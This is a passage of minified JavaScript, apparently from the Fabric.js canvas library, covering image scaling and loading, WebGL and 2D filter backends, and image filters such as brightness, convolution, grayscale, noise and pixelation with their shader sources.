O,b=j.util.parsePreserveAspectRatioAttribute(this.preserveAspectRatio||""),_=this._element.width,y=this._element.height,M=1,p=1,D=0,w=0,x=0,S=0,U=this.width,K=this.height,ee={width:U,height:K};return!b||"none"===b.alignX&&"none"===b.alignY?(M=U/_,p=K/y):("meet"===b.meetOrSlice&&(O=(U-_*(M=p=j.util.findScaleToFit(this._element,ee)))/2,"Min"===b.alignX&&(D=-O),"Max"===b.alignX&&(D=O),O=(K-y*p)/2,"Min"===b.alignY&&(w=-O),"Max"===b.alignY&&(w=O)),"slice"===b.meetOrSlice&&(O=_-U/(M=p=j.util.findScaleToCover(this._element,ee)),"Mid"===b.alignX&&(x=O/2),"Max"===b.alignX&&(x=O),O=y-K/p,"Mid"===b.alignY&&(S=O/2),"Max"===b.alignY&&(S=O),_=U/M,y=K/p)),{width:_,height:y,scaleX:M,scaleY:p,offsetLeft:D,offsetTop:w,cropX:x,cropY:S}}}),j.Image.CSS_CANVAS="canvas-img",j.Image.prototype.getSvgSrc=j.Image.prototype.getSrc,j.Image.fromObject=function(b,_){var y=j.util.object.clone(b);j.util.loadImage(y.src,function(M,p){p?_&&_(null,!0):j.Image.prototype._initFilters.call(y,y.filters,function(D){y.filters=D||[],j.Image.prototype._initFilters.call(y,[y.resizeFilter],function(w){y.resizeFilter=w[0],j.util.enlivenObjectEnlivables(y,y,function(){var x=new j.Image(M,y);_(x,!1)})})})},null,y.crossOrigin)},j.Image.fromURL=function(b,_,y){j.util.loadImage(b,function(M,p){_&&_(new j.Image(M,y),p)},null,y&&y.crossOrigin)},j.Image.ATTRIBUTE_NAMES=j.SHARED_ATTRIBUTES.concat("x y width height preserveAspectRatio xlink:href crossOrigin image-rendering".split(" ")),j.Image.fromElement=function(b,_,y){var M=j.parseAttributes(b,j.Image.ATTRIBUTE_NAMES);j.Image.fromURL(M["xlink:href"],_,g(y?j.util.object.clone(y):{},M))})}(we),j.util.object.extend(j.Object.prototype,{_getAngleValueForStraighten:function(){var E=this.angle%360;return E>0?90*Math.round((E-1)/90):90*Math.round(E/90)},straighten:function(){return this.rotate(this._getAngleValueForStraighten())},fxStraighten:function(E){var g=function(){},b=(E=E||{}).onComplete||g,_=E.onChange||g,y=this;return j.util.animate({target:this,startValue:this.get("angle"),endValue:this._getAngleValueForStraighten(),duration:this.FX_DURATION,onChange:function(M){y.rotate(M),_()},onComplete:function(){y.setCoords(),b()}})}}),j.util.object.extend(j.StaticCanvas.prototype,{straightenObject:function(E){return E.straighten(),this.requestRenderAll(),this},fxStraightenObject:function(E){return E.fxStraighten({onChange:this.requestRenderAllBound})}}),function(){"use strict";function E(b,_){var y="precision "+_+" float;\nvoid main(){}",M=b.createShader(b.FRAGMENT_SHADER);return b.shaderSource(M,y),b.compileShader(M),!!b.getShaderParameter(M,b.COMPILE_STATUS)}function g(b){b&&b.tileSize&&(this.tileSize=b.tileSize),this.setupGLContext(this.tileSize,this.tileSize),this.captureGPUInfo()}j.isWebglSupported=function(b){if(j.isLikelyNode)return!1;b=b||j.WebglFilterBackend.prototype.tileSize;var _=document.createElement("canvas"),y=_.getContext("webgl")||_.getContext("experimental-webgl"),M=!1;if(y){j.maxTextureSize=y.getParameter(y.MAX_TEXTURE_SIZE),M=j.maxTextureSize>=b;for(var p=["highp","mediump","lowp"],D=0;D<3;D++)if(E(y,p[D])){j.webGlPrecision=p[D];break}}return this.isSupported=M,M},j.WebglFilterBackend=g,g.prototype={tileSize:2048,resources:{},setupGLContext:function(b,_){this.dispose(),this.createWebGLCanvas(b,_),this.aPosition=new Float32Array([0,0,0,1,1,0,1,1]),this.chooseFastestCopyGLTo2DMethod(b,_)},chooseFastestCopyGLTo2DMethod:function(b,_){var M,y=void 0!==window.performance;try{new ImageData(1,1),M=!0}catch(ee){M=!1}var p="undefined"!=typeof ArrayBuffer,D="undefined"!=typeof Uint8ClampedArray;if(y&&M&&p&&D){var w=j.util.createCanvasElement(),x=new ArrayBuffer(b*_*4);if(j.forceGLPutImageData)return this.imageBuffer=x,void(this.copyGLTo2D=F);var O,U,S={imageBuffer:x,destinationWidth:b,destinationHeight:_,targetCanvas:w};w.width=b,w.height=_,O=window.performance.now(),Q.call(S,this.gl,S),U=window.performance.now()-O,O=window.performance.now(),F.call(S,this.gl,S),U>window.performance.now()-O?(this.imageBuffer=x,this.copyGLTo2D=F):this.copyGLTo2D=Q}},createWebGLCanvas:function(b,_){var y=j.util.createCanvasElement();y.width=b,y.height=_;var M={alpha:!0,premultipliedAlpha:!1,depth:!1,stencil:!1,antialias:!1},p=y.getContext("webgl",M);p||(p=y.getContext("experimental-webgl",M)),p&&(p.clearColor(0,0,0,0),this.canvas=y,this.gl=p)},applyFilters:function(b,_,y,M,p,D){var x,w=this.gl;D&&(x=this.getCachedTexture(D,_));var S={originalWidth:_.width||_.originalWidth,originalHeight:_.height||_.originalHeight,sourceWidth:y,sourceHeight:M,destinationWidth:y,destinationHeight:M,context:w,sourceTexture:this.createTexture(w,y,M,!x&&_),targetTexture:this.createTexture(w,y,M),originalTexture:x||this.createTexture(w,y,M,!x&&_),passes:b.length,webgl:!0,aPosition:this.aPosition,programCache:this.programCache,pass:0,filterBackend:this,targetCanvas:p},O=w.createFramebuffer();return w.bindFramebuffer(w.FRAMEBUFFER,O),b.forEach(function(U){U&&U.applyTo(S)}),function I(E){var g=E.targetCanvas,y=E.destinationWidth,M=E.destinationHeight;(g.width!==y||g.height!==M)&&(g.width=y,g.height=M)}(S),this.copyGLTo2D(w,S),w.bindTexture(w.TEXTURE_2D,null),w.deleteTexture(S.sourceTexture),w.deleteTexture(S.targetTexture),w.deleteFramebuffer(O),p.getContext("2d").setTransform(1,0,0,1,0,0),S},dispose:function(){this.canvas&&(this.canvas=null,this.gl=null),this.clearWebGLCaches()},clearWebGLCaches:function(){this.programCache={},this.textureCache={}},createTexture:function(b,_,y,M){var p=b.createTexture();return b.bindTexture(b.TEXTURE_2D,p),b.texParameteri(b.TEXTURE_2D,b.TEXTURE_MAG_FILTER,b.NEAREST),b.texParameteri(b.TEXTURE_2D,b.TEXTURE_MIN_FILTER,b.NEAREST),b.texParameteri(b.TEXTURE_2D,b.TEXTURE_WRAP_S,b.CLAMP_TO_EDGE),b.texParameteri(b.TEXTURE_2D,b.TEXTURE_WRAP_T,b.CLAMP_TO_EDGE),M?b.texImage2D(b.TEXTURE_2D,0,b.RGBA,b.RGBA,b.UNSIGNED_BYTE,M):b.texImage2D(b.TEXTURE_2D,0,b.RGBA,_,y,0,b.RGBA,b.UNSIGNED_BYTE,null),p},getCachedTexture:function(b,_){if(this.textureCache[b])return this.textureCache[b];var y=this.createTexture(this.gl,_.width,_.height,_);return this.textureCache[b]=y,y},evictCachesForKey:function(b){this.textureCache[b]&&(this.gl.deleteTexture(this.textureCache[b]),delete this.textureCache[b])},copyGLTo2D:Q,captureGPUInfo:function(){if(this.gpuInfo)return this.gpuInfo;var b=this.gl,_={renderer:"",vendor:""};if(!b)return _;var y=b.getExtension("WEBGL_debug_renderer_info");if(y){var M=b.getParameter(y.UNMASKED_RENDERER_WEBGL),p=b.getParameter(y.UNMASKED_VENDOR_WEBGL);M&&(_.renderer=M.toLowerCase()),p&&(_.vendor=p.toLowerCase())}return this.gpuInfo=_,_}}}(),function(){"use strict";var E=function(){};function g(){}j.Canvas2dFilterBackend=g,g.prototype={evictCachesForKey:E,dispose:E,clearWebGLCaches:E,resources:{},applyFilters:function(b,_,y,M,p){var D=p.getContext("2d");D.drawImage(_,0,0,y,M);var S={sourceWidth:y,sourceHeight:M,imageData:D.getImageData(0,0,y,M),originalEl:_,originalImageData:D.getImageData(0,0,y,M),canvasEl:p,ctx:D,filterBackend:this};return b.forEach(function(O){O.applyTo(S)}),(S.imageData.width!==y||S.imageData.height!==M)&&(p.width=S.imageData.width,p.height=S.imageData.height),D.putImageData(S.imageData,0,0),S}}}(),j.Image=j.Image||{},j.Image.filters=j.Image.filters||{},j.Image.filters.BaseFilter=j.util.createClass({type:"BaseFilter",vertexSource:"attribute vec2 aPosition;\nvarying vec2 vTexCoord;\nvoid main() {\nvTexCoord = aPosition;\ngl_Position = vec4(aPosition * 2.0 - 1.0, 0.0, 1.0);\n}",fragmentSource:"precision highp float;\nvarying vec2 vTexCoord;\nuniform sampler2D uTexture;\nvoid main() {\ngl_FragColor = texture2D(uTexture, vTexCoord);\n}",initialize:function(E){E&&this.setOptions(E)},setOptions:function(E){for(var g in E)this[g]=E[g]},createProgram:function(E,g,b){g=g||this.fragmentSource,b=b||this.vertexSource,"highp"!==j.webGlPrecision&&(g=g.replace(/precision highp float/g,"precision "+j.webGlPrecision+" float"));var _=E.createShader(E.VERTEX_SHADER);if(E.shaderSource(_,b),E.compileShader(_),!E.getShaderParameter(_,E.COMPILE_STATUS))throw new Error("Vertex shader compile error for "+this.type+": "+E.getShaderInfoLog(_));var y=E.createShader(E.FRAGMENT_SHADER);if(E.shaderSource(y,g),E.compileShader(y),!E.getShaderParameter(y,E.COMPILE_STATUS))throw new Error("Fragment shader compile error for "+this.type+": "+E.getShaderInfoLog(y));var M=E.createProgram();if(E.attachShader(M,_),E.attachShader(M,y),E.linkProgram(M),!E.getProgramParameter(M,E.LINK_STATUS))throw new Error('Shader link error for "${this.type}" '+E.getProgramInfoLog(M));var p=this.getAttributeLocations(E,M),D=this.getUniformLocations(E,M)||{};return D.uStepW=E.getUniformLocation(M,"uStepW"),D.uStepH=E.getUniformLocation(M,"uStepH"),{program:M,attributeLocations:p,uniformLocations:D}},getAttributeLocations:function(E,g){return{aPosition:E.getAttribLocation(g,"aPosition")}},getUniformLocations:function(){return{}},sendAttributeData:function(E,g,b){var _=g.aPosition,y=E.createBuffer();E.bindBuffer(E.ARRAY_BUFFER,y),E.enableVertexAttribArray(_),E.vertexAttribPointer(_,2,E.FLOAT,!1,0,0),E.bufferData(E.ARRAY_BUFFER,b,E.STATIC_DRAW)},_setupFrameBuffer:function(E){var b,_,g=E.context;E.passes>1?(_=E.destinationHeight,(E.sourceWidth!==(b=E.destinationWidth)||E.sourceHeight!==_)&&(g.deleteTexture(E.targetTexture),E.targetTexture=E.filterBackend.createTexture(g,b,_)),g.framebufferTexture2D(g.FRAMEBUFFER,g.COLOR_ATTACHMENT0,g.TEXTURE_2D,E.targetTexture,0)):(g.bindFramebuffer(g.FRAMEBUFFER,null),g.finish())},_swapTextures:function(E){E.passes--,E.pass++;var g=E.targetTexture;E.targetTexture=E.sourceTexture,E.sourceTexture=g},isNeutralState:function(){var E=this.mainParameter,g=j.Image.filters[this.type].prototype;if(E){if(Array.isArray(g[E])){for(var b=g[E].length;b--;)if(this[E][b]!==g[E][b])return!1;return!0}return g[E]===this[E]}return!1},applyTo:function(E){E.webgl?(this._setupFrameBuffer(E),this.applyToWebGL(E),this._swapTextures(E)):this.applyTo2d(E)},retrieveShader:function(E){return E.programCache.hasOwnProperty(this.type)||(E.programCache[this.type]=this.createProgram(E.context)),E.programCache[this.type]},applyToWebGL:function(E){var g=E.context,b=this.retrieveShader(E);g.bindTexture(g.TEXTURE_2D,0===E.pass&&E.originalTexture?E.originalTexture:E.sourceTexture),g.useProgram(b.program),this.sendAttributeData(g,b.attributeLocations,E.aPosition),g.uniform1f(b.uniformLocations.uStepW,1/E.sourceWidth),g.uniform1f(b.uniformLocations.uStepH,1/E.sourceHeight),this.sendUniformData(g,b.uniformLocations),g.viewport(0,0,E.destinationWidth,E.destinationHeight),g.drawArrays(g.TRIANGLE_STRIP,0,4)},bindAdditionalTexture:function(E,g,b){E.activeTexture(b),E.bindTexture(E.TEXTURE_2D,g),E.activeTexture(E.TEXTURE0)},unbindAdditionalTexture:function(E,g){E.activeTexture(g),E.bindTexture(E.TEXTURE_2D,null),E.activeTexture(E.TEXTURE0)},getMainParameter:function(){return this[this.mainParameter]},setMainParameter:function(E){this[this.mainParameter]=E},sendUniformData:function(){},createHelpLayer:function(E){if(!E.helpLayer){var g=document.createElement("canvas");g.width=E.sourceWidth,g.height=E.sourceHeight,E.helpLayer=g}},toObject:function(){var E={type:this.type},g=this.mainParameter;return g&&(E[g]=this[g]),E},toJSON:function(){return this.toObject()}}),j.Image.filters.BaseFilter.fromObject=function(E,g){var b=new j.Image.filters[E.type](E);return g&&g(b),b},function(E){"use strict";var g=E.fabric||(E.fabric={}),b=g.Image.filters;b.ColorMatrix=(0,g.util.createClass)(b.BaseFilter,{type:"ColorMatrix",fragmentSource:"precision highp float;\nuniform sampler2D uTexture;\nvarying vec2 vTexCoord;\nuniform mat4 uColorMatrix;\nuniform vec4 uConstants;\nvoid main() {\nvec4 color = texture2D(uTexture, vTexCoord);\ncolor *= uColorMatrix;\ncolor += uConstants;\ngl_FragColor = color;\n}",matrix:[1,0,0,0,0,0,1,0,0,0,0,0,1,0,0,0,0,0,1,0],mainParameter:"matrix",colorsOnly:!0,initialize:function(y){this.callSuper("initialize",y),this.matrix=this.matrix.slice(0)},applyTo2d:function(y){var x,S,O,U,K,p=y.imageData.data,D=p.length,w=this.matrix,ee=this.colorsOnly;for(K=0;K<D;K+=4)x=p[K],S=p[K+1],O=p[K+2],ee?(p[K]=x*w[0]+S*w[1]+O*w[2]+255*w[4],p[K+1]=x*w[5]+S*w[6]+O*w[7]+255*w[9],p[K+2]=x*w[10]+S*w[11]+O*w[12]+255*w[14]):(p[K]=x*w[0]+S*w[1]+O*w[2]+(U=p[K+3])*w[3]+255*w[4],p[K+1]=x*w[5]+S*w[6]+O*w[7]+U*w[8]+255*w[9],p[K+2]=x*w[10]+S*w[11]+O*w[12]+U*w[13]+255*w[14],p[K+3]=x*w[15]+S*w[16]+O*w[17]+U*w[18]+255*w[19])},getUniformLocations:function(y,M){return{uColorMatrix:y.getUniformLocation(M,"uColorMatrix"),uConstants:y.getUniformLocation(M,"uConstants")}},sendUniformData:function(y,M){var p=this.matrix,w=[p[4],p[9],p[14],p[19]];y.uniformMatrix4fv(M.uColorMatrix,!1,[p[0],p[1],p[2],p[3],p[5],p[6],p[7],p[8],p[10],p[11],p[12],p[13],p[15],p[16],p[17],p[18]]),y.uniform4fv(M.uConstants,w)}}),g.Image.filters.ColorMatrix.fromObject=g.Image.filters.BaseFilter.fromObject}(we),function(E){"use strict";var g=E.fabric||(E.fabric={}),b=g.Image.filters;b.Brightness=(0,g.util.createClass)(b.BaseFilter,{type:"Brightness",fragmentSource:"precision highp float;\nuniform sampler2D uTexture;\nuniform float uBrightness;\nvarying vec2 vTexCoord;\nvoid main() {\nvec4 color = texture2D(uTexture, vTexCoord);\ncolor.rgb += uBrightness;\ngl_FragColor = color;\n}",brightness:0,mainParameter:"brightness",applyTo2d:function(y){if(0!==this.brightness){var D,p=y.imageData.data,w=p.length,x=Math.round(255*this.brightness);for(D=0;D<w;D+=4)p[D]=p[D]+x,p[D+1]=p[D+1]+x,p[D+2]=p[D+2]+x}},getUniformLocations:function(y,M){return{uBrightness:y.getUniformLocation(M,"uBrightness")}},sendUniformData:function(y,M){y.uniform1f(M.uBrightness,this.brightness)}}),g.Image.filters.Brightness.fromObject=g.Image.filters.BaseFilter.fromObject}(we),function(E){"use strict";var g=E.fabric||(E.fabric={}),b=g.util.object.extend,_=g.Image.filters;_.Convolute=(0,g.util.createClass)(_.BaseFilter,{type:"Convolute",opaque:!1,matrix:[0,0,0,0,1,0,0,0,0],fragmentSource:{Convolute_3_1:"precision highp float;\nuniform sampler2D uTexture;\nuniform float uMatrix[9];\nuniform float uStepW;\nuniform float uStepH;\nvarying vec2 vTexCoord;\nvoid main() {\nvec4 color = vec4(0, 0, 0, 0);\nfor (float h = 0.0; h < 3.0; h+=1.0) {\nfor (float w = 0.0; w < 3.0; w+=1.0) {\nvec2 matrixPos = vec2(uStepW * (w - 1), uStepH * (h - 1));\ncolor += texture2D(uTexture, vTexCoord + matrixPos) * uMatrix[int(h * 3.0 + w)];\n}\n}\ngl_FragColor = color;\n}",Convolute_3_0:"precision highp float;\nuniform sampler2D uTexture;\nuniform float uMatrix[9];\nuniform float uStepW;\nuniform float uStepH;\nvarying vec2 vTexCoord;\nvoid main() {\nvec4 color = vec4(0, 0, 0, 1);\nfor (float h = 0.0; h < 3.0; h+=1.0) {\nfor (float w = 0.0; w < 3.0; w+=1.0) {\nvec2 matrixPos = vec2(uStepW * (w - 1.0), uStepH * (h - 1.0));\ncolor.rgb += texture2D(uTexture, vTexCoord + matrixPos).rgb * uMatrix[int(h * 3.0 + w)];\n}\n}\nfloat alpha = texture2D(uTexture, vTexCoord).a;\ngl_FragColor = color;\ngl_FragColor.a = alpha;\n}",Convolute_5_1:"precision highp float;\nuniform sampler2D uTexture;\nuniform float uMatrix[25];\nuniform float uStepW;\nuniform float uStepH;\nvarying vec2 vTexCoord;\nvoid main() {\nvec4 color = vec4(0, 0, 0, 0);\nfor (float h = 0.0; h < 5.0; h+=1.0) {\nfor (float w = 0.0; w < 5.0; w+=1.0) {\nvec2 matrixPos = vec2(uStepW * (w - 2.0), uStepH * (h - 2.0));\ncolor += texture2D(uTexture, vTexCoord + matrixPos) * uMatrix[int(h * 5.0 + w)];\n}\n}\ngl_FragColor = color;\n}",Convolute_5_0:"precision highp float;\nuniform sampler2D uTexture;\nuniform float uMatrix[25];\nuniform float uStepW;\nuniform float uStepH;\nvarying vec2 vTexCoord;\nvoid main() {\nvec4 color = vec4(0, 0, 0, 1);\nfor (float h = 0.0; h < 5.0; h+=1.0) {\nfor (float w = 0.0; w < 5.0; w+=1.0) {\nvec2 matrixPos = vec2(uStepW * (w - 2.0), uStepH * (h - 2.0));\ncolor.rgb += texture2D(uTexture, vTexCoord + matrixPos).rgb * uMatrix[int(h * 5.0 + w)];\n}\n}\nfloat alpha = texture2D(uTexture, vTexCoord).a;\ngl_FragColor = color;\ngl_FragColor.a = alpha;\n}",Convolute_7_1:"precision highp float;\nuniform sampler2D uTexture;\nuniform float uMatrix[49];\nuniform float uStepW;\nuniform float uStepH;\nvarying vec2 vTexCoord;\nvoid main() {\nvec4 color = vec4(0, 0, 0, 0);\nfor (float h = 0.0; h < 7.0; h+=1.0) {\nfor (float w = 0.0; w < 7.0; w+=1.0) {\nvec2 matrixPos = vec2(uStepW * (w - 3.0), uStepH * (h - 3.0));\ncolor += texture2D(uTexture, vTexCoord + matrixPos) * uMatrix[int(h * 7.0 + w)];\n}\n}\ngl_FragColor = color;\n}",Convolute_7_0:"precision highp float;\nuniform sampler2D uTexture;\nuniform float uMatrix[49];\nuniform float uStepW;\nuniform float uStepH;\nvarying vec2 vTexCoord;\nvoid main() {\nvec4 color = vec4(0, 0, 0, 1);\nfor (float h = 0.0; h < 7.0; h+=1.0) {\nfor (float w = 0.0; w < 7.0; w+=1.0) {\nvec2 matrixPos = vec2(uStepW * (w - 3.0), uStepH * (h - 3.0));\ncolor.rgb += texture2D(uTexture, vTexCoord + matrixPos).rgb * uMatrix[int(h * 7.0 + w)];\n}\n}\nfloat alpha = texture2D(uTexture, vTexCoord).a;\ngl_FragColor = color;\ngl_FragColor.a = alpha;\n}",Convolute_9_1:"precision highp float;\nuniform sampler2D uTexture;\nuniform float uMatrix[81];\nuniform float uStepW;\nuniform float uStepH;\nvarying vec2 vTexCoord;\nvoid main() {\nvec4 color = vec4(0, 0, 0, 0);\nfor (float h = 0.0; h < 9.0; h+=1.0) {\nfor (float w = 0.0; w < 9.0; w+=1.0) {\nvec2 matrixPos = vec2(uStepW * (w - 4.0), uStepH * (h - 4.0));\ncolor += texture2D(uTexture, vTexCoord + matrixPos) * uMatrix[int(h * 9.0 + w)];\n}\n}\ngl_FragColor = color;\n}",Convolute_9_0:"precision highp float;\nuniform sampler2D uTexture;\nuniform float uMatrix[81];\nuniform float uStepW;\nuniform float uStepH;\nvarying vec2 vTexCoord;\nvoid main() {\nvec4 color = vec4(0, 0, 0, 1);\nfor (float h = 0.0; h < 9.0; h+=1.0) {\nfor (float w = 0.0; w < 9.0; w+=1.0) {\nvec2 matrixPos = vec2(uStepW * (w - 4.0), uStepH * (h - 4.0));\ncolor.rgb += texture2D(uTexture, vTexCoord + matrixPos).rgb * uMatrix[int(h * 9.0 + w)];\n}\n}\nfloat alpha = texture2D(uTexture, vTexCoord).a;\ngl_FragColor = color;\ngl_FragColor.a = alpha;\n}"},retrieveShader:function(M){var p=Math.sqrt(this.matrix.length),D=this.type+"_"+p+"_"+(this.opaque?1:0),w=this.fragmentSource[D];return M.programCache.hasOwnProperty(D)||(M.programCache[D]=this.createProgram(M.context,w)),M.programCache[D]},applyTo2d:function(M){var ve,le,ye,z,l,f,A,v,P,G,X,L,h,p=M.imageData,D=p.data,w=this.matrix,x=Math.round(Math.sqrt(w.length)),S=Math.floor(x/2),O=p.width,U=p.height,K=M.ctx.createImageData(O,U),ee=K.data,se=this.opaque?1:0;for(X=0;X<U;X++)for(G=0;G<O;G++){for(l=4*(X*O+G),ve=0,le=0,ye=0,z=0,h=0;h<x;h++)for(L=0;L<x;L++)f=G+L-S,!((A=X+h-S)<0||A>=U||f<0||f>=O)&&(ve+=D[v=4*(A*O+f)]*(P=w[h*x+L]),le+=D[v+1]*P,ye+=D[v+2]*P,se||(z+=D[v+3]*P));ee[l]=ve,ee[l+1]=le,ee[l+2]=ye,ee[l+3]=se?D[l+3]:z}M.imageData=K},getUniformLocations:function(M,p){return{uMatrix:M.getUniformLocation(p,"uMatrix"),uOpaque:M.getUniformLocation(p,"uOpaque"),uHalfSize:M.getUniformLocation(p,"uHalfSize"),uSize:M.getUniformLocation(p,"uSize")}},sendUniformData:function(M,p){M.uniform1fv(p.uMatrix,this.matrix)},toObject:function(){return b(this.callSuper("toObject"),{opaque:this.opaque,matrix:this.matrix})}}),g.Image.filters.Convolute.fromObject=g.Image.filters.BaseFilter.fromObject}(we),function(E){"use strict";var g=E.fabric||(E.fabric={}),b=g.Image.filters;b.Grayscale=(0,g.util.createClass)(b.BaseFilter,{type:"Grayscale",fragmentSource:{average:"precision highp float;\nuniform sampler2D uTexture;\nvarying vec2 vTexCoord;\nvoid main() {\nvec4 color = texture2D(uTexture, vTexCoord);\nfloat average = (color.r + color.b + color.g) / 3.0;\ngl_FragColor = vec4(average, average, average, color.a);\n}",lightness:"precision highp float;\nuniform sampler2D uTexture;\nuniform int uMode;\nvarying vec2 vTexCoord;\nvoid main() {\nvec4 col = texture2D(uTexture, vTexCoord);\nfloat average = (max(max(col.r, col.g),col.b) + min(min(col.r, col.g),col.b)) / 2.0;\ngl_FragColor = vec4(average, average, average, col.a);\n}",luminosity:"precision highp float;\nuniform sampler2D uTexture;\nuniform int uMode;\nvarying vec2 vTexCoord;\nvoid main() {\nvec4 col = texture2D(uTexture, vTexCoord);\nfloat average = 0.21 * col.r + 0.72 * col.g + 0.07 * col.b;\ngl_FragColor = vec4(average, average, average, col.a);\n}"},mode:"average",mainParameter:"mode",applyTo2d:function(y){var D,x,p=y.imageData.data,w=p.length,S=this.mode;for(D=0;D<w;D+=4)"average"===S?x=(p[D]+p[D+1]+p[D+2])/3:"lightness"===S?x=(Math.min(p[D],p[D+1],p[D+2])+Math.max(p[D],p[D+1],p[D+2]))/2:"luminosity"===S&&(x=.21*p[D]+.72*p[D+1]+.07*p[D+2]),p[D]=x,p[D+1]=x,p[D+2]=x},retrieveShader:function(y){var M=this.type+"_"+this.mode;return y.programCache.hasOwnProperty(M)||(y.programCache[M]=this.createProgram(y.context,this.fragmentSource[this.mode])),y.programCache[M]},getUniformLocations:function(y,M){return{uMode:y.getUniformLocation(M,"uMode")}},sendUniformData:function(y,M){y.uniform1i(M.uMode,1)},isNeutralState:function(){return!1}}),g.Image.filters.Grayscale.fromObject=g.Image.filters.BaseFilter.fromObject}(we),function(E){"use strict";var g=E.fabric||(E.fabric={}),b=g.Image.filters;b.Invert=(0,g.util.createClass)(b.BaseFilter,{type:"Invert",fragmentSource:"precision highp float;\nuniform sampler2D uTexture;\nuniform int uInvert;\nvarying vec2 vTexCoord;\nvoid main() {\nvec4 color = texture2D(uTexture, vTexCoord);\nif (uInvert == 1) {\ngl_FragColor = vec4(1.0 - color.r,1.0 -color.g,1.0 -color.b,color.a);\n} else {\ngl_FragColor = color;\n}\n}",invert:!0,mainParameter:"invert",applyTo2d:function(y){var D,p=y.imageData.data,w=p.length;for(D=0;D<w;D+=4)p[D]=255-p[D],p[D+1]=255-p[D+1],p[D+2]=255-p[D+2]},isNeutralState:function(){return!this.invert},getUniformLocations:function(y,M){return{uInvert:y.getUniformLocation(M,"uInvert")}},sendUniformData:function(y,M){y.uniform1i(M.uInvert,this.invert)}}),g.Image.filters.Invert.fromObject=g.Image.filters.BaseFilter.fromObject}(we),function(E){"use strict";var g=E.fabric||(E.fabric={}),b=g.util.object.extend,_=g.Image.filters;_.Noise=(0,g.util.createClass)(_.BaseFilter,{type:"Noise",fragmentSource:"precision highp float;\nuniform sampler2D uTexture;\nuniform float uStepH;\nuniform float uNoise;\nuniform float uSeed;\nvarying vec2 vTexCoord;\nfloat rand(vec2 co, float seed, float vScale) {\nreturn fract(sin(dot(co.xy * vScale ,vec2(12.9898 , 78.233))) * 43758.5453 * (seed + 0.01) / 2.0);\n}\nvoid main() {\nvec4 color = texture2D(uTexture, vTexCoord);\ncolor.rgb += (0.5 - rand(vTexCoord, uSeed, 0.1 / uStepH)) * uNoise;\ngl_FragColor = color;\n}",mainParameter:"noise",noise:0,applyTo2d:function(M){if(0!==this.noise){var w,x,O,D=M.imageData.data,S=this.noise;for(w=0,x=D.length;w<x;w+=4)O=(.5-Math.random())*S,D[w]+=O,D[w+1]+=O,D[w+2]+=O}},getUniformLocations:function(M,p){return{uNoise:M.getUniformLocation(p,"uNoise"),uSeed:M.getUniformLocation(p,"uSeed")}},sendUniformData:function(M,p){M.uniform1f(p.uNoise,this.noise/255),M.uniform1f(p.uSeed,Math.random())},toObject:function(){return b(this.callSuper("toObject"),{noise:this.noise})}}),g.Image.filters.Noise.fromObject=g.Image.filters.BaseFilter.fromObject}(we),function(E){"use strict";var g=E.fabric||(E.fabric={}),b=g.Image.filters;b.Pixelate=(0,g.util.createClass)(b.BaseFilter,{type:"Pixelate",blocksize:4,mainParameter:"blocksize",fragmentSource:"precision highp float;\nuniform sampler2D uTexture;\nuniform float uBlocksize;\nuniform float uStepW;\nuniform float uStepH;\nvarying vec2 vTexCoord;\nvoid main() {\nfloat blockW = uBlocksize * uStepW;\nfloat blockH = uBlocksize * uStepW;\nint posX = int(vTexCoord.x / blockW);\nint posY = int(vTexCoord.y / blockH);\nfloat fposX = float(posX);\nfloat fposY = float(posY);\nvec2 squareCoords = vec2(fposX * blockW, fposY * blockH);\nvec4 color = texture2D(uTexture, squareCoords);\ngl_FragColor = color;\n}",applyTo2d:function(y){var x,S,O,U,K,ee,se,ve,le,ye,z,M=y.imageData,p=M.data,D=M.height,w=M.width;for(S=0;S<D;S+=this.blocksize)for(O=0;O<w;O+=this.blocksize)for(U=p[x=4*S*w+4*O],K=p[x+1],ee=p[x+2],se=p[x+3],ye=Math.min(S+this.blocksize,D),z=Math.min(O+this.blocksize,w),ve=S;ve<ye;ve++)for(le=O;le<z;le++)p[x=4*ve*w+4*le]=U,p[x+1]=K,p[x+2]=ee,p[x+3]=se},isNeutralState:function(){return 1===this.blocksize},getUniformLocations:function(y,M){return{uBlocksize:y.getUniformLocation(M,"uBlocksize"),uStepW:y.getUniformLocation(M,"uStepW"),uStepH:y.getUniformLocation(M,"uStepH")}},sendUniformData:function(y,M){y.uniform1f(M.uBlocksize,this.blocksize)}}),g.Image.filters.Pixelate.fromObject=g.Image.filters.BaseFilter.fromObject}(we),function(E){"use strict";var g=E.fabric||(E.fabric={}),b=g.util.object.extend,_=g.Image.filters;_.RemoveColor=(0,g.util.createClass)(_.BaseFilter,{type:"RemoveColor",color:"#FFFFFF",fragmentSource:"precision highp float;\nuniform sampler2D uTexture;\nuniform vec4 uLow;\nuniform vec4 uHigh;\nvarying vec2 vTexCoord;\nvoid main() {\ngl_FragColor = texture2D(uTexture, vTexCoord);\nif(all(greaterThan(gl_FragColor.rgb,uLow.rgb)) && all(greaterThan(uHigh.rgb,gl_FragColor.rgb))) {\ngl_FragColor.a = 0.0;\n}\n}",distance:.02,useAlpha:!1,applyTo2d:function(M){var w,S,O,U,D=M.imageData.data,x=255*this.distance,K=new g.Color(this.color).getSource(),ee=[K[0]-x,K[1]-x,K[2]-x],se=[K[0]+x,K[1]+x,K[2]+x];for(w=0;w<D.length;w+=4)O=D[w+1],U=D[w+2],(S=D[w])>ee[0]&&O>ee[1]&&U>ee[2]&&S<se[0]&&O<se[1]&&U<se[2]&&(D[w+3]=0)},getUniformLocations:function(M,p){return{uLow:M.getUniformLocation(p,"uLow"),uHigh:M.getUniformLocation(p,"uHigh")}},sendUniformData:function(M,p){var D=new g.Color(this.color).getSource(),w=parseFloat(this.distance),S=[D[0]/255+w,D[1]/255+w,D[2]/255+w,1];M.uniform4fv(p.uLow,[0+D[0]/255-w,0+D[1]/255-w,0+D[2]/255-w,1]),M.uniform4fv(p.uHigh,S)},toObject:function(){return b(this.callSuper("toObject"),{color:this.color,distance:this.distance})}}),g.Image.filters.RemoveColor.fromObject=g.Image.filters.BaseFilter.fromObject}(we),function(E){"use strict";var 